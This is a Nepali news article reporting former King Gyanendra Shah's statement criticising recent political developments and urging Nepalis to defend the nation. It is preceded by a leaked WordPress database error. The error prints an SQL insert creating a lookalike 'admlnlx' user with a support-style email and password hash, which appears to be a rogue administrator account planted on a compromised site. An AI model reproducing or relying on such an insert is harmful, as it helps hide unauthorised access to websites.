WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BzJToHglSRz6qNJpJ3fb4X4gYEmZL8.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 10:07:35', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस ६-
पूर्वराजा ज्ञानेन्द्र शाहले बुधबार विज्ञप्ति सार्वजनिक गर्दै पछिल्लो राजनीतिक घटनाक्रमप्रति तिब्र असन्तुष्टि व्यक्त गरेका छन्। विशेष सन्दर्भमा मात्र विज्ञप्ति सार्वजनिक गर्ने ज्ञानेन्द्रले बुधबार कुनै सन्दर्भबिना पछिल्लो राजनीतिक गतिविधिमाथि टिप्पणी गर्दै विज्ञप्ति सार्वजनिक गरेका हुन् ।
पूर्वराजा ज्ञानेन्द्रले सार्वजनिक गरेको विज्ञप्तिमा नेपाली जनताको आस्था नढलेकाले जाग्नुपर्ने बेला आएकोसमेत उल्लेख गरेका छन् । उनले नेपाल र नेपालीको अजय शक्तिको रक्षा गर्न सबैलाई आह्वान गरेका छन् । विज्ञप्तिमा पछिल्लो राजनीतिक घटनाक्रमप्रति तिब्र असन्तुष्टि व्यक्त गरिएको छ ।
‘अझै पनि जनताका आस्थाहरु ढलेका छैनन् । नेपाली मन मस्तिष्कमा देशभक्तिको भावना ढलेको छैन । सबै नेपालीले राष्ट्र बचाउन फेरी एक पटक इतिहासले सुम्पिएको गहन जिम्मेवारी पुरा गर्न र देशको अस्तित्व आफ्ना सन्ततिलाई सुम्पन्न प्रमुख र प्रखर रुपले जाग्नै परेको छ र लाग्नै परेको छ,’ विज्ञप्तिमा भनिएको छ, ‘राष्ट्रप्रेम र राष्ट्रप्रतिको समर्पणबाटै एकता, अखण्डता र अविभाज्यताको सन्देश फैलाउनु परेको छ । हामी मरे पनि नेपाल बांचिरहोस् भन्ने संकल्पबाट नै नेपाल र नेपालीको अजेय शक्तिको रक्षा गरौं ! समय भड्की सकेपछि पश्चातापले कुनै अर्थ राख्दैन ।’